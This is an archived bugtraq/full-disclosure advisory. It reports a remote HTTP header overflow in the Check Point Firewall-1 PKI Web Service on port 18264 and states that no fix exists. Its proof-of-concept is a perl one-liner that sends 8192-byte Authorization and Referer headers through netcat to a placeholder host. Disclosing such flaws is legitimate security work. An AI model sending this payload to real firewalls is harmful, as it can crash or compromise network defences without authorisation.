Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, fd <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
From: Bugs NotHugs <bugsnothugs@xxxxxxxxx>
Date: Mon, 30 Mar 2009 02:16:17 -0600
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=qArGWP9HspEPqSzHb4u/wPHWIP2bKhbAVBwgXqC6EsA=; b=FGu66dBs9Rbqy8KV40tyj6WObZ0wHQzgggmX4wkBT6iJ+hcsttk5QNOY73cSt8/47a 5DTYaoHPv6v/m2tKP5JcpcgXis9a/Phe2gdFWw28SbqjzNY1DbV7USE3Rwrxqol8pIDV wCkgbxXiFGEHovqhhk+wZZyaCDSNTgnMpcaS8=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=EdgISW5Jf3XmvHenaHSsNyY3lRcZoXDviRgBYl4LKW4feBPMyosDel/MFzBudRtHEH jKw4FvlqsNBe9E4W6XI3NpI1CeqVTAVrCqoOB7qykgIwECUTBbrFyV4h5mfNN4Xf8iYF DH/21nChkXUUWSfcxFAbjh7EMTcPS2GVN40so=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.

- Product

Check Point, Firewall-1, unknown

- PoC

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@xxxxxxxx\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/"; . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

- Solution

None

- Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account

Prev by Date: [ MDVSA-2009:081 ] libsoup
Next by Date: [ GLSA 200903-40 ] Analog: Denial of Service
Previous by thread: [ MDVSA-2009:081 ] libsoup
Next by thread: [ GLSA 200903-40 ] Analog: Denial of Service
Index(es):
- Date
- Thread